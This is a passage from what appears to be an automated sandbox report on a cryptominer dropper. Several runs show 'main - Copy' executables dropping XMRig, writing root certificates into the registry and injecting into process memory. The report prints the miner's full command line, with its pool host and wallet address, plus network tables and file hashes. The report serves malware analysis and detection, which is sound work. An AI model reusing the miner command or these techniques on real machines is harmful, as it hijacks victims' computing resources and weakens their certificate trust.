| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5300 wrote to memory of 972 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5300 wrote to memory of 972 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1324 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3104 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.246.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/972-16-0x00000239C88A0000-0x00000239C88C0000-memory.dmp
memory/972-17-0x00000239CA010000-0x00000239CA030000-memory.dmp
memory/972-18-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-19-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-21-0x00000239CA030000-0x00000239CA050000-memory.dmp
memory/972-20-0x00000239CA050000-0x00000239CA070000-memory.dmp
memory/972-22-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-23-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-24-0x00000239CA050000-0x00000239CA070000-memory.dmp
memory/972-25-0x00000239CA030000-0x00000239CA050000-memory.dmp
memory/972-26-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-27-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-28-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-29-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-30-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-31-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-32-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-33-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-34-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-35-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-36-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-37-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-38-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-39-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-40-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-41-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-42-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-43-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-44-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-45-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-46-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-47-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-48-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-49-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-50-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-51-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-52-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-53-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-54-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-55-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-56-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-57-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-58-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-59-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-60-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-61-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-62-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-63-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-64-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-65-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-66-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-67-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-68-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-69-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-70-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-71-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-72-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-73-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-74-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-75-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-76-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-77-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-78-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-79-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-80-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-81-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-82-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-83-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
memory/972-84-0x00007FF73AB60000-0x00007FF73B663000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1712 wrote to memory of 3116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1712 wrote to memory of 3116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.57:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.79.70.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3116-16-0x000001A3321D0000-0x000001A3321F0000-memory.dmp
memory/3116-17-0x000001A332320000-0x000001A332340000-memory.dmp
memory/3116-18-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-20-0x000001A332360000-0x000001A332380000-memory.dmp
memory/3116-19-0x000001A332340000-0x000001A332360000-memory.dmp
memory/3116-21-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-22-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-23-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-24-0x000001A332340000-0x000001A332360000-memory.dmp
memory/3116-25-0x000001A332360000-0x000001A332380000-memory.dmp
memory/3116-26-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-27-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-28-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-29-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-30-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-31-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-32-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-33-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-34-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-35-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-36-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-37-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-38-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-39-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-40-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-41-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-42-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-43-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-44-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-45-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-46-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-47-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-48-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-49-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-50-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-51-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-52-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-53-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-54-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-55-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-56-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-57-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-58-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-59-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-60-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-61-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-62-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-63-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-64-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-65-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-66-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-67-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-68-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-69-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-70-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-71-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-72-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-73-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-74-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-75-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-76-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-77-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-78-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-79-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-80-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-81-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-82-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-83-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
memory/3116-84-0x00007FF7E4060000-0x00007FF7E4B63000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
